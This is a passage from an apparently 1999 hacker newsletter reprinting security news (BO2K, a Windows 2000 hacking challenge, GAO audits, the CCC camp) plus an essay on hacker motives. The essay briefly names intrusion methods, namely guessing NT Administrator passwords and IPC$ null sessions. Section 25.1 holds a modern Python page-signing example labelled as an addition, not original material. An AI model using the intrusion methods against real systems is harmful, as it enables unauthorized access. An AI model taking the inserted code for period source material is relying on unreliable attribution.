      originally hit the Internet last year when the Cult of the Dead Cow, a less virginal hacking
      group, announced the program at the hacking confab known as DEF CON. 

      Last month, the Cult of the Dead Cow followed up with an upgraded version known as BO2K,
      which had racked up 128,776 app downloads as of July 22. Once the "server" part of the
      program is installed on a target PC, a user -- or hacker -- can remotely control that PC through
      the Internet using the "client" program. 

      The program runs on Windows 95/98, NT and 2000 and uses encryption to secure client-server
      communications. 

      Internet security firms and Microsoft have called the program malicious and have posted security
      warnings about it. 
      
      @HWA

20.0 MS Wants Free Publicity 
     ~~~~~~~~~~~~~~~~~~~~~~~~ 

     From HNN http://www.hackernews.com/

      found on slashdot 
      In an obvious ploy to get free publicity Microsoft has
      set up a Windows 2000 machine on the internet and
      invited people to break in. Microsoft wants to create
      the most secure version of Windows ever, which is a
      laudable goal. It is hoped that this is not a primary
      testing method. Not only is attacking a system blind
      over the net probably one of the hardest things to do but
      the people who could actually accomplish this task have
      more important things to do other than testing Microsoft
      products for free. Of course a few months from now I'm
      sure we will hear how Windows 2000 stood up to X
      number of 'hack' attempts via the internet and is now
      the most secure version of Windows ever. Phalease. 

      http://www.windows2000test.com/  <- hack me
      
20.1 MS: a crashed site is hard to hack!      
      ----------------------------------
      
      This story was printed from Sm@rt Reseller,
      located at http://www.zdnet.com/sr.
      --------------------------------------------------------------
      
      Microsoft to Hackers: Crack This!
      By David Raikow, Sm@rt Reseller
      August 4, 1999 3:24 PM PT
      URL: http://www.zdnet.com/sr/stories/news/0,4538,2309474,00.html
      
      In an attempt to burnish its tarnished reputation for network security, Microsoft issued an open
      challenge on Tuesday to the hacking community. But potential testers barely got a chance to
      attempt to break Windows 2000's security system, as the test server Microsoft offered crashed
      and stayed down for most of the past 24 hours. 
      
      Microsoft placed a web server running the latest beta of Windows 2000 and Internet Information
      Server (IIS) outside its firewalls, and invited the public to go after target files and user accounts it
      placed there. The company's reason for doing so? "We hope that this kind of open testing will
      allow us to ship our most secure OS yet," said a Microsoft spokesperson. 
      
      The hacking community was and is largely unimpressed, however. In its posted coverage, the
      Hacker News Network called the challenge "an obvious ploy to get free publicity...It is hoped that
      this is not a primary testing method." 
      
      Members of the Linux-enthusiast site Slashdot for the most part concurred, accusing Microsoft of
      using anti-Microsoft sentiment for free auditing. 
      
      Meanwhile, the Linux community created a counter-challenge of its own. Tuesday afternoon,
      LinuxPPC, the developers and distributors of a PowerPC-native version of Linux, challenged
      hackers to crack one of its servers. Unlike Microsoft, which did not offer any kind of incentive or
      award to hackers, LinuxPPC is giving the machine to the first person to break in. 
      
      Whoops! 
      
      If it was meant as a publicity stunt, the Microsoft security challenge may have backfired. As soon
      as the site went online, Microsoft ran into technical difficulties with the test server. Early visitors
      reported problems with the home-page HTML and Javascript, some serious enough to prevent
      them accessing the page at all. Posted status logs indicate that the server had to be rebooted at
      least once because the system log was full, and some services were unavailable at reboot. 
      
      Most significantly, the server was offline for most of Tuesday due to what Microsoft described as
      "router problems". Though intermittently available Wednesday morning, the site was down at press
      time, and appears to have been pulled from DNS servers entirely; ping tests indicated the MS
      router was functional. Some Slashdot contributors reported seeing a notice that the site had been
      withdrawn, but no such notice is currently posted on any publicly accessible MS server. 
      
      A Microsoft spokesperson attributed some of the difficulties to thunderstorms in Seattle on
      Tuesday, but had no comment on the site's status at press time. 
            
      
      
      @HWA
      
21.0 China Seeks to Develop Infowar Capabilities 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

     From HNN http://www.hackernews.com/
     
      contributed by Code Kid 
      A Chinese military newspaper covering the activities of
      China's People's Liberation Army has called for the
      recruitment of 'civilian hackers' and for the training of
      'cyber warriors' at Army schools. 

      Internet News      
      http://www.internetnews.com/intl-news/article/0,1087,6_173341,00.html
      
      
      Chinese Military Seeks to Train Cyber Warriors 
      
      August 3, 1999
      Hans Lombardo, Managing Editor, asia.internet.com 
      
      
      [Hong Kong, CHINA] The Chinese military hopes to develop the capability of
      engaging in warfare over the Internet by training hackers to take the battle online. 
      
      The Liberation Army Daily (LAD), a mouthpiece of China's People's Liberation
      Army (PLA), recently called for the development of this capability. The paper said
      that, by recruiting civilian hackers and training "cyber warriors" at Army schools,
      China could be prepared for an Internet war. 
      
      The call was made in response to several hacking incidents in the US and China
      after NATO's bombing of China's Belgrade Embassy. The Army paper
      reported that a "battle" was fought on the Internet between US and Chinese
      hackers. 
      
      In May, Chinese hackers infiltrated various US government sites including the
      Department of Energy (DOE), the Department of the Interior (DOI), the US
      Embassy in China, and the Naval Communications Command. Nearly a thousand
      US civilian sites were broken into in the two days following the bombing, sources
      said. 
      
      According to the Chinese military paper, US hackers responded by
      "counterattacking" several civilian sites in China. 
      
      More recently, the Chinese government has been accused of waging a cyber war
      against the outlawed Chinese sect, Falun Gong. Webmasters in Canada, the US,
      and the UK have reported that their sites, hosting or linking to the sect's sites, were
      sabotaged or brought down by hackers traced to Chinese domains. 
      
      In addition to this, Beijing has moved its rhetorical campaign against the sect on to
      the Web. The China Internet Information Center and The China Daily have set up
      anti-Falun Gong sites.
      
      
      Copyright 1999 internet.com Corp. 
      All Rights Reserved. 
      
      @HWA
      
22.0 Online Banking Still Risky Congress Says 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  

      From HNN http://www.hackernews.com/

      contributed by Inf0rmant 
      Over 6 million Americans use the internet to do their
      banking, pay bills, transfer money, apply for loans, etc.
      A new report released by the General Accounting Office
      examined 81 financial institutions and found that 35 of
      them, about 44 percent, had not taken all the
      risk-limiting steps regulators had recommended.
      Unfortunately the report did not examine the client side
      security of internet banking. With programs like NetBus
      and BO2K floating around that is where the real danger
      lies. 

      Nando Times
      http://www.nandotimes.com/technology/story/body/0,1634,77392-122285-862902-0,00.html
      
      Many banking firms' online options still risky, GAO says 

      Copyright © 1999 Nando Media
      Copyright © 1999 Associated Press
      
      By MARCY GORDON 
      
      WASHINGTON (August 3, 1999 10:57 a.m. EDT http://www.nandotimes.com) - Internet banking carries more risk than the traditional bricks-and-mortar
      variety, yet 44 percent of the financial institutions in a survey hadn't taken all the steps deemed necessary to limit risks, congressional
      investigators said in a new report. 
      
      The number of banks, thrifts and credit unions offering Internet banking has nearly tripled over the past year, and more than 6 million Americans go
      online to transfer money between accounts, pay bills, check account or investment balances and apply for loans. 
      
      Some lawmakers are concerned about the safety and security of online banking and the possibility that consumers could lose money or have their
      financial privacy breached by hackers. 
      
      "The American banking system has proven capable of providing full security and privacy," said Rep. Spencer Bachus, R-Ala., chairman of the House
      Banking subcommittee on monetary policy. "Our challenge is making sure the current rush to technology does not outpace that proven ability." 
      
      The new report by the General Accounting Office, Congress' investigative arm, concludes that Internet banking is by nature riskier than
      conventional banking. The GAO's review of banking regulators' examinations of 81 financial institutions found that 35 of them, about 44 percent,
      hadn't taken all the risk-limiting steps regulators have said are needed. 
      
      The report was being released Tuesday at a hearing of Bachus's subcommittee. 
      
      It found, for example, that the boards of directors of some financial institutions had failed to approve strategic plans for Internet banking, and some
      institutions lacked policies and procedures covering online operations. 
      
      The report noted that despite these deficiencies, the review - conducted from April 1998 to May 1999 - didn't turn up any financial losses or
      security breaches in online banking. However, the GAO auditors said, the sample of bank examinations reviewed was too small to support strong
      conclusions about the banking industry. 
      
      Relatively few examinations have been conducted because Internet banking is fairly new and examiners have focused on the banking industry's
      efforts to solve the Year 2000 computer problem, the GAO said. 
      
      In a related development, federal regulators reported Monday that 99 percent of the nation's federally insured banks, thrifts and credit unions have
      successfully completed preparations for the millennial date change. 
      
      Many major U.S. banks now offer Internet banking, supplementing their traditional branch services. In addition, there has been a recent push
      toward virtual, branchless banking, with online brokerage firm ETrade acquiring Telebanc Financial for $1.6 billion and Bank One launching
      WingspanBank.com. 
      
      Yet, even with the explosive growth of electronic commerce and online investing, most consumers are still somewhat hesitant about conducting
      financial transactions on the Internet, and even more so when it comes to managing their finances. 
      
      According to a June report by investment firm Goldman Sachs, only as many as 4 percent of U.S. households currently use online banking products.
      That number is expected to jump to about 20 percent by 2002. 
      
      
      @HWA
      
23.0 NIPRNet Access Restricted 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~  

      From HNN http://www.hackernews.com/
      
      contributed by evilwench 
      A directive to eliminate unauthorized access to the
      Non-Classified IP Router Network will soon be issued
      from The Office of the Secretary of Defense. DOD is
      cracking down on unofficial connections to NIPRNet in
      an effort to increase security. 

      Government Computer News      
      http://www.gcn.com/vol18_no24/news/351-1.html
          
      August 2, 1999

      DOD will crack down on access to Niprnet 
  
      By Bill Murray
      GCN Staff
  
      The Office of the Secretary of Defense soon will issue a directive to eliminate
      unauthorized back-door access to the Non-Classified IP Router Network.
  
      "It's being worked on right now," said Air Force Maj. Gen. John H. Campbell, vice
      director of the Defense Information Systems Agency, who spoke at length
      recently about much of the work on DISA's plate.
  
      "Unless you have a waiver with a specific reason," Defense Department agencies
      will not be allowed to maintain these unapproved links, Campbell said in a recent
      interview.
  
      It's unofficial.
  
      DOD officials are cracking down on unofficial connections to improve security, he
      said. "The NIPRnet grew up around convenience, not security," Campbell said.
  
      With electronic commerce, logistics and other business processes heavily reliant on the Internet, DISA
      officials are using eight official NIPRnet gateways to improve access, Campbell said.
  
      Meanwhile, regarding the Defense Information Infrastructure's Common Operating Environment, senior
      DOD brass recently reaffirmed their support for the DISA-run interoperability effort, Campbell said.
  
      The department's work on developing an enterprisewide systems plan, known as the Global Network
      Information Enterprise initiative, will not eliminate DII COE, he said, echoing comments made recently
      by Marvin Langston, DOD's deputy chief information officer [GCN, May 10, Page 1].
  
      Campbell said DOD officials are also pleased with the progress of Defense Message System
      installations. More than 210 sites worldwide use it, he said. Organizational use doubled during the past
      two months, while AUTODIN use decreased, Campbell said.
  
      DISA's Joint Interoperability Test Command is testing DMS Release 2.1, Campbell said.
  
      "The directories and infrastructure are stable and responsive," he said. Message exchange, delivery,
      speed of service and other critical performance measures "appear to be doing well," he said.
  
      DISA is planning several pilots later this year in support of medium-grade messaging, a managed
      commercial e-mail service targeted at users who do not need command and control capabilities,
      Campbell said. Medium-grade messaging will use DOD public-key infrastructure software certificates,
      he said.
  
      Campbell also praised the way DOD handled the Melissa virus. He said the department's systems
      defense team worked with software vendors to ensure software patches were available for DOD users to
      download within six hours of the first reports of the outbreak.
  
      "By midnight, both patches worked, and they were posted on a Web site," said Campbell, who is
      commander of the department's Joint Task Force for Computer Network Defense. Campbell said he was
      paged about the first DOD Melissa infections at 6:30 p.m. on March 26.
  
      The department's Computer Emergency Response Center officials from each service asked
      organizations to post banners on their networks asking users not to open e-mail messages with subject
      headers reading "important message from," even if they knew the sender.
  
      CERC has primary, day-to-day interaction with DOD organizations, Campbell said, and it reports to the
      task force, which is primarily concerned with organized attacks on Defense systems.
  
      For example, no such attacks materialized during Operation Allied Force, Campbell said. "There was
      quite a bit of hacker activity from Serbia, but by and large it falls into the nuisance category," such as
      defacing Web sites, he said.
  
      Network Associates Inc. of Santa Clara, Calif., and Symantec Corp. of Cupertino, Calif., the companies
      that produced the patches for Melissa, hold antivirus software licenses with DISA.
  
      Campbell said DISA officials have committed to giving the task force $3.2 million in fiscal 2000. 
  

      @HWA                                                                                        

24.0 Gov Employees Personal Privacy at Risk 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Sarge 
      Information stored on the National Finance Center's
      computer systems, including sensitive government
      personnel and financial information, is at risk of
      disclosure or destruction. The GAO report found that
      the NFC, under the Agriculture Department's control,
      had given legitimate users too much access. The NFC
      said it has completed some corrective actions and is
      working on the rest. 

      Federal Computer Week
      http://www.fcw.com:80/pubs/fcw/1999/0802/web-nfc-8-3-99.html
      
      AUGUST 3, 1999 . . . 13:20 EDT 

 
      GAO finds security lax for federal employees'
      personal info
 
      BY COLLEEN O'HARA (ohara@fcw.com)
 
      Weak access controls are placing sensitive government personnel and
      financial information stored on the National Finance Center's computer
      systems at risk of disclosure or destruction, according to a new General
      Accounting Office report.
 
      The Agriculture Department's NFC operates financial systems such as
      payroll/personnel and accounting systems for the USDA and about 60 other
      federal organizations. The NFC also maintains the records of the multibillion
      dollar Thrift Savings Program, a type of 401(k) program for federal
      employees.
 
      The GAO concluded that problems with NFC's access control "placed
      sensitive personnel information at risk of disclosure, critical financial operations
      at risk of disruption and assets at risk of loss." Logical, system software and
      physical access controls are designed to protect computer databases from
      enabling unauthorized users to access or change the data stored in the
      systems.
 
      The GAO found that NFC had given legitimate users too much access to
      financial and sensitive personal information. For example, GAO found that 86
      users had the ability to read and alter any data stored on tape regardless of
      other security software controls that were in place. NFC said they have taken
      steps to limit this access, according to the report.
 
      In addition, GAO found that users could bypass certain access controls and
      gain unauthorized access to financial and other sensitive data that the NFC
      maintains or cause system failures. For example, the system software that
      controls batch processing allowed any user with the ability to execute a batch
      program also to shut down the system or turn off features such as the security
      software.
 
      In its response to the report, the NFC said it has "already completed
      corrective actions on most of the items and [it has] planned appropriate
      corrective actions on the rest."

      @HWA
      
      
      
      
25.0 Other Security Challenges Offered 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      contributed by Space Rogue 
      Yesterday Microsoft placed a Windows 2000 machine
      outside of its firewall and asked people to break into it.
      Today the folks at LinuxPPC have issued a similar
      challenge except they are offering the machine itself to
      the person who breaks in while Microsoft has not
      offered any incentive. The Microsoft site was down
      most of the day yesterday and the LinuxPPC site was
      unreachable this morning when we attempted to check
      it. Companies need to realize that these "Hacker
      Challenges" are not valid testing methods and are
      nothing more than publicity stunts. If you want a valid
      security assessment then spend the money and hire an
      independent third party to review your product. 

      Windows 2000 Test
      http://www.windows2000.com
      
      Linux PPC
      http://crack.linuxppc.org/
      
      ZD Net
      http://www.zdnet.com/zdnn/stories/news/0,4586,2309474,00.html

      See also a previous article in the HNN Buffer Overflow
      section
      The Hacker Challenge   
      http://www.hackernews.com/orig/chall.html
      
      
      Reprinted below from an earlier version of HNN
      
      The Hacker Challenge

     By: Qubik (qubik@bikkel.com)

     You have probably read about them and some of you may
     have even participated in one or two. Hacker challenges;
     where you're asked to bypass the latest security measure
     implemented into technology which is already, prior to
     testing, dubbed as the latest in computer protection. But
     for what in return? Most challenges offer a reward of some
     sorts, a reward which is more often than not, a five or six
     figure with a dollar sign placed neatly at the beginning. 

     So just what is the deal with these challenges? What
     purpose do they really serve and are they just marketing
     ploys? 

     I'd like you to imagine for a moment that you're an
     administrator of a small corporate network. It's not the
     most exciting of jobs, and you don't have time to keep up
     with the latest goings-on in the security scene. Your
     network has been attacked a few times before, and you
     start to think about upgrading your security. So where do
     you start? 

     Where else would you start, but the internet? It's the
     world's largest resource, and every good company dealing
     with network security, is bound to be on the internet
     somewhere. So you use a search engine or two and you
     come across a web site for a new state of the art firewall,
     whose manufacturers claim it resisted every hacker that
     attempted to hack it at a recent hacker convention. You're
     amazed, surely their high price tag is nothing for complete
     security!? 

     Only what if it is all a clever ploy, haven't you got to ask
     yourself just how many people actually tried to hack into
     that particular piece of software? Haven't you got to look
     into the reputation of the manufacturer? Of course you
     do! To be sure, you've got to ask for the cold hard facts,
     not the marketing babble! 

     There are serious flaws in many hacker challenges, not
     the least being that most 'real' hackers only hear about
     them after they've finished. This makes you wonder just
     who took part, and how they found out about it. 

     It's not uncommon for hackers and security analysts to
     earn wages in excess of six figures, and to earn such
     wages, you've got to be either very lucky, or very busy.
     So what's your guarantee that a hacker who actually
     knows what he is doing, actually took the time out to earn
     a, comparatively, small ten thousand? You have no
     guarantee at all, why on earth should he or she bother? 

     Next ask yourself whether real hackers would want to find
     all those bugs in that new technological innovation. Surely
     they're only going to end up making their job, of hacking,
     harder by pointing them out? 

     However, a low-level source code analysis of a piece of
     software or a close look at hardware by a reputable third
     party security analysis company will delay product ship
     times and cost a lot more than setting up a hacker
     challenge. Not to mention that it has nowhere near the
     same marketing punch. Display your product at an
     upcoming convention and let people bang on it for a
     weekend and then claim "Product X survives Hacker
     Challenge." Makes a great press release. 

     It all seems rather corrupt, with companies hiding the
     truth and rubbing their hands at the millions they make. A
     ten thousand dollar reward seems rather pathetic, when
     you're earning ten times that kind of money. Surely these
     companies know this, are they in fact attempting to social
     engineer the hackers or maybe worse their customers? 

     But it's not all like that, there are plenty of genuine
     challenges out there. Some have been set up to test
     software and, now more and more, hardware, others
     testing entire networks. For example, recently the Quebec
     government is enlisting the aid of hackers to test its
     networks and to research new ways of protecting those
     networks. 

     So what can we say about hacker challenges? Do they
     really prove how secure a product is? I don't think so, the
     fact that most aren't officially announced to the hacker
     public and that they are often deliberately misinterpreted,
     doesn't give a good impression. But then, who should a
     company go to? It's not the easiest of tasks in the world,
     to announce such a challenge. 

     Hack at your own discretion, don't be afraid to take part
     in a hacker challenge, but don't take the word of the
     manufacturer, when they say it's secure, just because a
     few passers-by at a convention typed a few keys on a
     keyboard. There will always be flaws in hardware and
     software, it's up to us, the true hackers, to find and fix
     them, whether we do it for the company's marketing
     campaign, or for personal gratification. 
      
     @HWA
     
25.1 Software developer offers hacker challenge
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      http://technology.news.com.au/techno/4108922.htm
    
      Developer issues hacker challenge
      By JENNIFER FORESHEW
    
      3aug99
    
      A SMALL Sydney company that has developed software designed to
      make Web sites hack-proof, has thrown out a challenge to crack the
      technology. 
    
      Creative Digital Technology (CDT) has developed software which, when
      downloaded, makes a site secure. 
    
      "We are prepared to stand behind that financially by offering a prize to
      universities to see if they can do what our developers haven't been
      able to do," CDT chief operating officer Philip Burton said. 
    
      CDT, which developed the country's first SET (Secure Electronic
      Transaction) enabled products, is launching the SecurePage product at
      Internet World 99 this week. 
    
      "We can protect any Web site," CDT chief executive Bahram Boutorabi
      said. "The first version of the product runs on Microsoft's Internet
      Information Server platform, but we are planning to roll out across all
      platforms." 
    
      Mr Boutorabi, who is also technology officer, said many sites could be
      hacked because they were developed using mostly straight text. 
    
      "We have developed the technology to put something into Active
      Server Pages, HTML, Net Commerce Mark-up Language and XML, which
      represents a signature that someone has made against that page," Mr
      Boutorabi said. 
    
      Any attempt to alter a Web site's content would result in action being
      taken by the system, which is protected by 192-bit, Triple-DES
      encryption. 
    
      "If the contents of that page have been altered for any reason it will
      stop serving that content out and serve it from its own content area,
      where everything is fully encrypted," Mr Boutorabi said. 
    
      "SecurePage enables an administrator to put a disc into the system, run
      the administration and tell it to sign all of the pages with their
      password. 
    
      "To alter the code or text, you have to have administrative access to
      change the content or to stop the system." 
    
      Mr Burton, who is also a senior partner in CDT, said the company began
      working on the technology after attacks on high-profile Web sites. 
    
      "This came about from evidence that significant Web sites were being
      hacked and destroyed. 
    
      "We believed we could deliver a protection device in software form that
      could be downloaded from our Web site by whoever was hosting that
      particular site." 
    
      CDT declined to reveal further details of the technology pending
      approval of a patent on SecurePage. 
    
      If you decide to take up CDT's challenge to crack its software,
      Computers & High Technology wants to know. E-mail us at
      auscomp@ozemail.com.au -- but only if you are successful. 
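
      The tamper-detection flow the article describes (sign each page, stop
      serving altered content, fall back to a protected copy), as an added
      example that is not CDT's code and not part of the original article.
      HMAC-SHA256 with a password-derived key stands in for SecurePage's
      undisclosed signature scheme, and an in-memory dict stands in for its
      encrypted content area; all names and sample values are hypothetical.

```python
import hashlib
import hmac


def derive_key(password: str, salt: bytes) -> bytes:
    """Derive the signing key from the administrator's password (assumed design)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)


class SignedPageStore:
    """Serve a page only while its MAC still matches the one recorded at signing."""

    def __init__(self, key: bytes):
        self._key = key
        self._sigs = {}        # path -> MAC recorded when the admin signed the page
        self._protected = {}   # path -> known-good copy (stand-in for the encrypted area)
        self.alerts = []       # (path, reason) tuples for the operator to review

    def _mac(self, path: str, content: bytes) -> bytes:
        # Bind the path into the MAC so a validly signed page cannot be
        # copied over a different URL without detection.
        msg = path.encode() + b"\x00" + content
        return hmac.new(self._key, msg, hashlib.sha256).digest()

    def sign(self, path: str, content: bytes) -> None:
        """Administrative step: record the MAC and keep a protected copy."""
        self._sigs[path] = self._mac(path, content)
        self._protected[path] = content

    def serve(self, path: str, webroot: dict):
        """Return the bytes to send, or None if the page was never signed."""
        expected = self._sigs.get(path)
        if expected is None:
            # A file that appeared without being signed is refused outright.
            self.alerts.append((path, "unsigned"))
            return None
        live = webroot.get(path)
        # compare_digest avoids leaking MAC bytes through comparison timing.
        if live is not None and hmac.compare_digest(self._mac(path, live), expected):
            return live
        self.alerts.append((path, "modified" if live is not None else "missing"))
        return self._protected[path]


def demo():
    # Constructed sample data: a one-page site, then a simulated defacement.
    key = derive_key("constructed-admin-password", b"constructed-salt")
    store = SignedPageStore(key)
    webroot = {"/index.html": b"<h1>Welcome</h1>"}
    for path, content in webroot.items():
        store.sign(path, content)

    clean = store.serve("/index.html", webroot)

    webroot["/index.html"] = b"<h1>defaced</h1>"   # content altered on disk
    webroot["/new.html"] = b"<h1>dropped</h1>"     # file added without signing
    after = store.serve("/index.html", webroot)
    dropped = store.serve("/new.html", webroot)
    return clean, after, dropped, store.alerts


if __name__ == "__main__":
    print(demo())
```

      The check only holds while the key and the recorded MACs stay out of
      reach of whoever can write to the web root, which matches the article's
      point that changing content requires administrative access.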
      
      @HWA          
        
26.0 CCC Camp About to Get Under Way 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     From HNN http://www.hackernews.com/

      contributed by Frank 
      The organizers of CCC Camp continue their preparations
      for this weekend. It is expected that 3000 people will
      descend onto a field outside Berlin where they will share
      secrets of technology and discuss issues that affect us
      all. And pick a few locks. 

      Wired
      http://www.wired.com/news/news/culture/story/21104.html?wnpg=1
      
      HNN Cons Page
      http://www.hackernews.com/cons/cons.html
      
      
     Chaos in Berlin
     by Steve Kettmann 
     
     3:00 a.m.  5.Aug.99.PDT
     BERLIN -- This weekend's Chaos Communication Camp outside East Berlin will be more than just a good time, event organizers say. 
     
     The three-day event will be a combination hacker-fest, technology be-in, workshop smorgasbord, celebration of camping and swimming, and
     lock-picking seminar -- with metal locks, for a change. Around 3,000 people are expected to attend, each paying an entrance fee of DM150
     (US$82). 
     
     
     
     
     The event will be the first of its kind in Germany, but it draws on the tradition established with two similar events in the Netherlands. CCC
     organizers have consulted with the people behind Hacking in Progress, the most recent of which was held outside of Amsterdam in scorching
     weather two summers ago. 
     
     "We've worked a lot with the Amsterdam people," said Chaos Computer Club spokesman Andy Muller-Maguhn. "Five of them even moved to Berlin for
     three months to help us get organized, and another 20 are coming for the camp. 
     
     "HIP was a great experience, but the workshop part of the program was a catastrophe. The heat was so bad and they had tents rented from a
     circus. The sound was so bad, you couldn't hear it from 10 feet away." 
     
     Besides hiring a security company with expertise in handling tech events (and decorating them), CCC organizers can also rely on the German flair for
     organization. More than 300 volunteers have already assembled outside East Berlin and laid down three kilometers of fiber optic cable and 14
     kilometers of power cable, among other things. Every aspect of the weekend has been planned diligently. 
     
     The goal is to provide more than a "hacker holiday," as Muller-Maguhn put it. He aims to encourage some deep thinking about technology and where
     it's going -- and not just from the kind of people who are light-years ahead of the rest of us. 
     
     In fact, the first of the 27 workshops is intended to help general-interest participants get a handle on things. It will be called "How to ask for help
     on the Net," and will be led by CCC member Ron Fulda. 
     
     "We will not be able to benefit from technology if people feel overrun by it, if people feel handled by machines, rather than feeling that they can
     handle them," said Muller-Maguhn. 
     
     "There are a lot of people 35 or 40 who are unemployed because they were replaced in their job by a fucking machine. They just don't understand
     it." 
     
     The nod to the less sophisticated is probably a good idea. As much as people in Berlin and elsewhere in Germany might respect the CCC for some of
     its high-profile exploits -- like hacking into NASA's computer in the mid-'80s -- some worry that they are losing touch with mainstream computer
     users. 
     
     "The Chaos Computer Club has done some very interesting things," said Herbert Thaten, whose Netz-Werk cybercafe in East Berlin does a booming
     business. 
     
     "They stand for finding holes in the computer systems of big companies. But I went to one of their workshops last year, and it was only for
     specialists. No one there could understand what the speaker was talking about." 
     
     The complete list of workshops was due to be posted shortly at the CCC Web site, but another example of the more accessible workshops is
     "Creating Politics of Crypto Software," led by American hacker Lucky Green. More than half the workshops are in English, and all will be freewheeling
     affairs, if organizers have their way. 
     
     "We have a very qualified audience in an informal setting," said another CCC spokesman, Frank Rieger. "If someone is standing up there telling
     bullshit, he will only be doing it about one minute and then someone will correct him." 
     
     It's easy to take Rieger at his word, sitting with him in the CCC offices in East Berlin, near Humboldt University, not far from Bertolt-Brecht-Platz.
     One large white wall is devoid of notable decoration, except for a black-and-white poster of Mahatma Gandhi kneeling and reading -- with an Apple
     logo in one corner. 
     
     High on an adjacent wall, next to a painting of Christ -- so the tone of ironic worship is not lost -- is a liberated façade from a Geldautomat, a
     German ATM machine. 
     
     The hacker movement in Germany is so high profile it has established itself almost as a branch of government. And it wrestles openly with the
     question of how to respond to technology. Stefan Wernery, one of the two founding fathers of the CCC, devotes much of his time these days to
     lock-picking on good, old-fashioned metal, à la Artemus Gordon -- just the sort of thing the least tech-conscious person can appreciate. 
     
     "It's sort of lock-picking as sporting event," said Rieger. "They are teaching people how unsecure locks are." 
     
     Even if they may lose touch with the masses at times, CCC members spend a lot of time thinking about how they connect with the general public. 
     
     "We can say it's important to give the normal people -- and also politicians and journalists -- an understanding of how the tools work,"
     Muller-Maguhn said. "In America, more people have email, yes, but technology is driven by big corporations that think about profit and things like
     customer profiling. 
     
     "For us it's important to give all groups an understanding of how computers and networks work. Compared to the US, the European public has very
     critical discussions about technology. Maybe that's one reason why technology is not integrated so rapidly. 
     
     "People are not as careless as in the United States. They ask, 'What if?' They think about 1984 and Big Brother. That's always on our minds, so we
     don't have computers that can be switched to fascist mode," Muller-Maguhn said. 
     
     That might even translate into Europeans, always considered backward when it comes to new technologies, having a little something to show their
     American counterparts. 
     
     "The American hacker community is organized very differently than ours," said Muller-Maguhn. "I find it strange. Some groups are very political.
     Some are very technical. I have the feeling there is a very little in common between them. I don't even think they like each other. 
     
     "In Europe we try to be both. We consult with politicians on censoring and so forth, and of course we are in a way a public institution. We try to
     provide information, freedom, and transparency of technology." 
      
     
     @HWA


27.0 Hackers... Those Who Would Be Gods 
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      contributed by Hex_Edit 
      A very interesting perspective about why some people
      do what they do has been sent to us by a member of
      the group "HackCanada". Hex_Edit asks whether it is
      for the knowledge, just to post graffiti, testing security,
      or some other reason that drives some members of the
      community. 

      Hackers... Those Who Would Be Gods
      http://www.hackernews.com/orig/why.html
      
      Hackers... Those who would be gods


      Why do we hack?

      Is it to alter webpages and leave some type of cybergang
      inner-city graffiti? Is it to laugh in the face of over-paid,
      under-qualified sysadmins? Well for myself, and everyone I
      associate with, the answer to both of those would be no.
      So then, why do we do it? To seek knowledge? Perhaps...
      That is definitely an overused and somewhat groundless
      excuse. We seek knowledge and wisdom every waking
      moment. Every breath we inhale leases us another 3
      seconds of learning. Yes breaching a network's security
      does without a doubt involve learning. Yet do we not, on
      occasion, breach systems using exactly the same method
      as we have used previously? So in that case, why do we
      do it? If you have broken one NT box by guessing the
      Administrator's password, why would we do it again to a
      different NT machine? Have we not already learned how to
      use an IPC$ share to gain the name of the re-named
      Admin account? We already know how to glean hidden
      shares from the aforementioned null connection. What are
      we learning from repeating the task? Nothing. So why
      then? I suppose the first few times, is in the hope that
      you will run into a new challenge. And sometimes we do,
      but is it often enough to chalk it all up to the great quest
      for knowledge? I personally wonder if that is true. Maybe
      as much as we shudder to admit it, it all comes down to
      two reasons. One is simply because it is there, and
      because we can. The other is slightly more sinister... We
      are voyeurs. We want to know what interesting stuff is on
      the other side. Whether we are corporate voyeurs, or
      peeping toms rifling through some hapless 98 user's
      hard-drive. Sir Edmund Hillary once said, when questioned
      as to why he wished to climb Everest, "Simply because it
      is there." Are we really that shallow? Do we do this all
      simply because we can? Is the great quest for knowledge
      nothing more than what we tell ourselves to appease our
      conscience? Yet on the other hand I feel that there must
      be more to it. Maybe we really do have a primal thirst for
      information that isn't readily available to us. Perhaps we
      have a hidden side, that no one ever sees. A side that
      nothing ever senses but our keyboards. A darker vampiric,
      hematophagous side that thirsts for the life giving
      hemoglobin of information. A part of us so powerful it has
      altered our very genetic state. Have we evolved past the
      majority of our peers? Have we become demi-gods of a
      brave new "virtual" world? 

      If you could imagine for a second, that we were to carry
      the same abilities and powers into the real world. What
      would we see? You are having an annoying conversation
      with someone you dislike, in a heartbeat they vanish from
      sight. You could instantly alter every part of your
      appearance, as to be totally unrecognizable, or to appear
      to be someone else entirely. Any company or person you
      wished, with a wave of your hand, they would lose the
      ability to communicate with anyone else in the world. You
      could be a ghost, and ethereally pass through any locked
      door or alarm system. You could grab any piece of
      information you desired from that home or office, and pass
      back through its locked doors, without any trace. 

      Would these abilities not elevate us above normal human
      status? Is coding not the act of creation on a God like
      scale? "I wrote a little telnet app yesterday." Would
      translate, "Well you know, it took me a couple of hours,
      but I built this nifty little machine that allows me to
      instantly teleport myself to anywhere in the world." If that
      is the translation for writing a telnet app, what would
      everyone think of the guys that wrote Half life? :) 

      So then back to our lives in this virtual world. Are we
      Gods? No. To us there is only one true God. And that is
      the Internet herself. All of her protocols, and operating
      systems. All of her routers, switches, fiber, and servers.
      Every tiny part of her, that communicate so eloquently
      together, as to create a whole. A whole entire being, that
      we all reside within. This is our God. This is whom we
      choose to worship. So what are we then my Hacker
      brethren? We make up less than 1% of all who reside
      within. Are we priests? No, I would place that label on the
      sysadmins, and helpdesk jockeys who instruct the herd.
      Perhaps we are Demons? Do demons not belong to the
      darkside, to the anti-God? If the Internet is our God, who
      is our Devil? Is it possible to have a positive without a
      negative, a Yin without a Yang? We must have an
      anti-God, yet what? I am not sure I know the answer.
      Could it be all that seek to control her? All that seek to
      bend our God to their gluttonous financial and controlling
      gain? It sounds plausible, and don't we battle against
